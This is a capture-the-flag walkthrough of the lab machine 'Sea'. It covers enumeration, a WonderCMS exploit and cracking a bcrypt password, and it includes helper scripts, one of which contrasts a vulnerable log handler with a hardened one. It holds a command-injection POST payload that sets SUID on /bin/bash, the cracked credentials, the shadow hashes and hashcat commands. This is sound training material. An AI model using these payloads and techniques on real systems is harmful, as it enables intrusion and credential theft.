Basic information

Port scan

22,80:

$ nmap -sC -sV -Pn 10.10.11.28
Starting Nmap 7.95 ( https://nmap.org ) at 2024-08-12 13:20 CST
Nmap scan report for 10.10.11.28
Host is up (0.095s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 e3:54:e0:72:20:3c:01:42:93:d1:66:9d:90:0c:ab:e8 (RSA)
| 256 f3:24:4b:08:aa:51:9d:56:15:3d:67:56:74:7c:20:38 (ECDSA)
|_ 256 30:b1:05:c6:41:50:ff:22:a3:7f:41:06:0e:67:fd:50 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-title: Sea - Home
593/tcp filtered http-rpc-epmap
749/tcp filtered kerberos-adm
2301/tcp filtered compaqdiag
2557/tcp filtered nicetec-mgmt
6129/tcp filtered unknown
10003/tcp filtered documentum_s
49156/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.13 seconds

80

Visiting the IP directly shows nothing of interest; the how-to-participate page contains a link to http://sea.htb/contact.php:

sea.htb

After adding the hosts entry and opening it, we get a page for submitting information:

10.10.11.28 sea.htb

Submitting a URL as a test, our side receives an automatic visit from the target (whatever we submit gets opened on the other side):

Directory scan

The wordlist needs to be a bit larger, and enumerate one level at a time:

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt  -t 50 -u http://sea.htb/

/0 (Status: 200) [Size: 3650]
/404 (Status: 200) [Size: 3341]
/data (Status: 301) [Size: 228] [--> http://sea.htb/data/]
/home (Status: 200) [Size: 3650]
/messages (Status: 301) [Size: 232] [--> http://sea.htb/messages/]
/plugins (Status: 301) [Size: 231] [--> http://sea.htb/plugins/]
/themes (Status: 301) [Size: 230] [--> http://sea.htb/themes/]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt -t 50 -u http://sea.htb/themes/

/404 (Status: 200) [Size: 3341]
/bike (Status: 301) [Size: 235] [--> http://sea.htb/themes/bike/]
/home (Status: 200) [Size: 3650]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/big.txt -t 50 -u http://sea.htb/themes/bike/

/404 (Status: 200) [Size: 3341]
/LICENSE (Status: 200) [Size: 1067]
/css (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/css/]
/home (Status: 200) [Size: 3650]
/img (Status: 301) [Size: 239] [--> http://sea.htb/themes/bike/img/]
/summary (Status: 200) [Size: 66]
/version (Status: 200) [Size: 6]

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/Roundcube-123.txt -t 50 -u http://sea.htb/themes/bike/

/LICENSE (Status: 200) [Size: 1067]
/README.md (Status: 200) [Size: 318]
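The level-by-level enumeration above is easier to drive from the tool's output than by eye. The following helper is an added example, not part of the original write-up; the sample lines are copied from the first gobuster run above. It parses `gobuster dir` output, separates the catch-all responses (`/0`, `/404` and `/home` return only two distinct sizes, which is what a CMS that routes every unknown path to a page looks like) from real hits, and lists the directories to feed into the next run.

```python
import re

# Constructed sample input: lines in the shape of the first gobuster run above.
SAMPLE_OUTPUT = """\
/0 (Status: 200) [Size: 3650]
/404 (Status: 200) [Size: 3341]
/data (Status: 301) [Size: 228] [--> http://sea.htb/data/]
/home (Status: 200) [Size: 3650]
/messages (Status: 301) [Size: 232] [--> http://sea.htb/messages/]
/plugins (Status: 301) [Size: 231] [--> http://sea.htb/plugins/]
/themes (Status: 301) [Size: 230] [--> http://sea.htb/themes/]
"""

# One gobuster "dir" result line: path, status, size and an optional redirect target.
LINE_RE = re.compile(
    r"^(?P<path>/\S*)\s+\(Status:\s*(?P<status>\d{3})\)"
    r"\s+\[Size:\s*(?P<size>\d+)\]"
    r"(?:\s+\[-->\s*(?P<redirect>[^\]\s]+)\])?\s*$"
)


def parse_gobuster(text):
    """Parse gobuster output into dicts; banner and progress lines are skipped."""
    results = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        d = m.groupdict()
        results.append({
            "path": d["path"],
            "status": int(d["status"]),
            "size": int(d["size"]),
            "redirect": d["redirect"],
        })
    return results


def filter_catch_all(results, baseline_paths=("/404", "/home")):
    """Drop 200 responses whose size matches a known catch-all page.

    /404 is the soft-404 page and /home the default page; any other 200 with one
    of those two sizes is the same page served under a different name.
    """
    baseline = {r["size"] for r in results if r["path"] in baseline_paths}
    return [r for r in results
            if not (r["status"] == 200 and r["size"] in baseline)]


def next_level_targets(results):
    """Directories to scan at the next depth: 301s that redirect to a '/' path."""
    return [r["redirect"] for r in results
            if r["status"] == 301 and r["redirect"] and r["redirect"].endswith("/")]


if __name__ == "__main__":
    # Typical use: gobuster dir -u http://sea.htb/ -w big.txt -o level1.txt,
    # then feed level1.txt here and run gobuster again against each target.
    parsed = parse_gobuster(SAMPLE_OUTPUT)
    for hit in filter_catch_all(parsed):
        print(hit)
    print("next:", next_level_targets(parsed))
```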

The README shows that this is WonderCMS:

WonderCMS

Searching for WonderCMS then turns up a related vulnerability:

We already saw on the contact page that the URL we submit is visited automatically, so this vulnerability can be exploited.

The public exploit needs a small change: as written it downloads its zip from GitHub, so change it to fetch the zip from our own machine instead, submit the generated URL through the contact form, and we get a shell as www-data:

Information

Routine browsing through the files yields a password hash:

$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q

The password can be cracked (`$2y$` is bcrypt, hashcat mode 3200):

sudo hashcat -m 3200 hash.txt ~/Tools/dict/rockyou.txt

mychemicalromance

user flag

The user amay can log in over SSH with this password:

System Monitor

Checking the listening ports shows 8080 bound to localhost. After forwarding it out, opening it prompts for a login; amay's credentials work, and it turns out to be a System Monitor:

ssh amay@10.10.11.28 -L 8081:127.0.0.1:8080

amay
mychemicalromance

A little testing reveals a very basic command injection, and the commands run as root:

Privilege escalation & root flag

The simplest route is to set the SUID bit on bash directly. In the POST body below, `+` encodes a space and `%2B` the literal `+`; the backticks are shell command substitution inside the command the monitor builds around the log path. Afterwards `bash -p` as amay gives a root shell (without `-p` bash drops the elevated effective UID):

log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log`chmod+%2Bs+/bin/bash`&analyze_log=
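What the monitor does with that body, as an added example that is not code from the box or the write-up: the first function decodes the exact payload above the way a form handler would (nothing is executed); `analyze_vulnerable` is a hypothetical reconstruction of the bug class, a user-supplied path interpolated into a shell command string; `analyze_hardened` is the fix, an allow-list key plus an argv list so no shell ever parses user input. The injected command used in the demo only writes a marker to stderr, so the script is safe to run.

```python
import os
import subprocess
import tempfile
from urllib.parse import parse_qs

# The POST body from the write-up. It is only decoded here, never executed.
PAGE_PAYLOAD = ("log_file=%2Fvar%2Flog%2Fapache2%2Faccess.log"
                "`chmod+%2Bs+/bin/bash`&analyze_log=")


def decode_form(body):
    """Decode an application/x-www-form-urlencoded body like the server does:
    '+' becomes a space and %2B the literal '+'. keep_blank_values keeps the
    empty analyze_log field that triggers the action."""
    return {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def analyze_vulnerable(log_file):
    """Hypothetical vulnerable handler: the path lands inside a shell string, so
    backticks, $( ), ';' and '|' are all interpreted. Returns (stdout, stderr)."""
    cmd = f"tail -n 3 {log_file}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout, proc.stderr


# Assumed allow-list for the fixed version: the client picks a name, never a path.
ALLOWED_LOGS = {
    "apache_access": "/var/log/apache2/access.log",
    "apache_error": "/var/log/apache2/error.log",
}


def analyze_hardened(log_name, allowed=ALLOWED_LOGS):
    """Fixed handler: allow-list lookup and an argv list (no shell involved)."""
    if log_name not in allowed:
        raise ValueError(f"unknown log: {log_name!r}")
    proc = subprocess.run(["tail", "-n", "3", allowed[log_name]],
                          capture_output=True, text=True)
    return proc.stdout, proc.stderr


def demo_injection():
    """Harmless stand-in for the write-up's payload: the substituted command
    prints a marker to stderr and expands to nothing, so the outer command is
    still 'tail -n 3 /dev/null'. Returns True if the injected command ran."""
    harmless = "/dev/null`echo INJECTED >&2`"
    _out, err = analyze_vulnerable(harmless)
    return "INJECTED" in err


def demo_hardened():
    """The same injected string is rejected, and a legitimate name still works.
    Uses a constructed temporary log file instead of /var/log."""
    with tempfile.TemporaryDirectory() as d:
        path = os.path.join(d, "access.log")
        with open(path, "w") as f:
            f.write("line1\nline2\nline3\nline4\n")
        allowed = {"test_log": path}
        try:
            analyze_hardened("/dev/null`echo INJECTED >&2`", allowed)
            return False  # should have been rejected
        except ValueError:
            pass
        out, _err = analyze_hardened("test_log", allowed)
        return out == "line2\nline3\nline4\n"


if __name__ == "__main__":
    print(decode_form(PAGE_PAYLOAD))
    print("vulnerable handler ran injected command:", demo_injection())
    print("hardened handler safe:", demo_hardened())
```

Because the monitor runs as root, whatever the substitution evaluates to runs as root, which is why `chmod +s /bin/bash` is enough. If the application genuinely has to accept a path rather than a name, resolve it with `os.path.realpath`, require it to sit under the log directory, and still pass it as an argv element rather than through a shell.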

shadow

root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::
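The bcrypt hash from the web root and the three shadow entries above use different crypt formats, and picking the right hashcat mode from the prefix is the first step of any offline attack. The following parser is an added example, not part of the original write-up; the hash strings are the ones shown on this page, and the mode table is the standard hashcat mapping for these prefixes.

```python
from datetime import date, timedelta

# Hash strings as they appear in this write-up.
WEB_HASH = "$2y$10$iOrk210RQSAzNCx6Vyq2X.aJ/D.GuE4jRIikYiWrD3TM/PjDnXm4q"
SHADOW = """\
root:$6$llVzHhr7xHrvx1wJ$gH0PLbyPaIOqLrpjpzGZbM2bZ/iHaOfv/bj1YRrktVeZ8.1KQ0Jr1Rv/TL/3Qdh84Fwec1UhX2v0LVAGsuzq.0:19775:0:99999:7:::
amay:$6$S1AGe5ex2k4D5MKa$gTclSeJwvND3FINpZaK0zfUqk6T9IkhlxCn17fNWLx56u.zP/f/4e5YrJRPsM3TRuuKXQDfYL44RyPzduexsm.:19775:0:99999:7:::
geo:$6$5mAIqOze4GJ4s9Zu$P3IgUSHlcCkKpDJ0862IgP5aqaNilEUZDGIm16FiWdxh1A5dfKjmwhMgp3xctHiHZVWGtmKY25cCrILanDPaG.:19934:0:99999:7:::
"""

# crypt(3) / bcrypt prefix -> (algorithm, hashcat -m mode). yescrypt ($y$) is the
# modern Debian/Ubuntu default and has no hashcat mode; use John the Ripper for it.
HASH_MODES = {
    "$1$": ("md5crypt", 500),
    "$2a$": ("bcrypt", 3200),
    "$2b$": ("bcrypt", 3200),
    "$2y$": ("bcrypt", 3200),
    "$5$": ("sha256crypt", 7400),
    "$6$": ("sha512crypt", 1800),
    "$y$": ("yescrypt", None),
}

EPOCH = date(1970, 1, 1)


def identify(hash_str):
    """Return (algorithm, hashcat mode) for a crypt-style hash, or ('unknown', None)."""
    for prefix, info in HASH_MODES.items():
        if hash_str.startswith(prefix):
            return info
    return ("unknown", None)


def bcrypt_cost(hash_str):
    """Cost factor of a bcrypt hash ($2y$10$ -> 10, i.e. 2**10 rounds)."""
    return int(hash_str.split("$")[2])


def parse_shadow(text):
    """Parse /etc/shadow lines into dicts; locked/unset accounts get mode None."""
    entries = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) < 9:  # shadow(5) defines nine colon-separated fields
            continue
        user, hash_str, last_change, min_d, max_d, warn, _inact, _exp, _flag = fields[:9]
        locked = hash_str in ("", "*", "!", "!!") or hash_str.startswith("!")
        algo, mode = ("locked", None) if locked else identify(hash_str)
        entries.append({
            "user": user,
            "hash": hash_str,
            "algorithm": algo,
            "mode": mode,
            "last_change": EPOCH + timedelta(days=int(last_change)) if last_change else None,
            "max_days": int(max_d) if max_d else None,
        })
    return entries


def hashcat_input(entries, mode):
    """Lines for a hashcat file in user:hash form (run with --username)."""
    return [f"{e['user']}:{e['hash']}" for e in entries if e["mode"] == mode]


if __name__ == "__main__":
    print(identify(WEB_HASH), "cost", bcrypt_cost(WEB_HASH))
    for e in parse_shadow(SHADOW):
        print(e["user"], e["algorithm"], e["mode"], e["last_change"])
    # e.g. hashcat -m 1800 --username shadow.hashes rockyou.txt
    print("\n".join(hashcat_input(parse_shadow(SHADOW), 1800)))
```

The password-change dates are worth noting on a real engagement: a hash last changed on the same day as root's usually belongs to an account set up at build time, whereas geo's later date marks a more recent change.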

References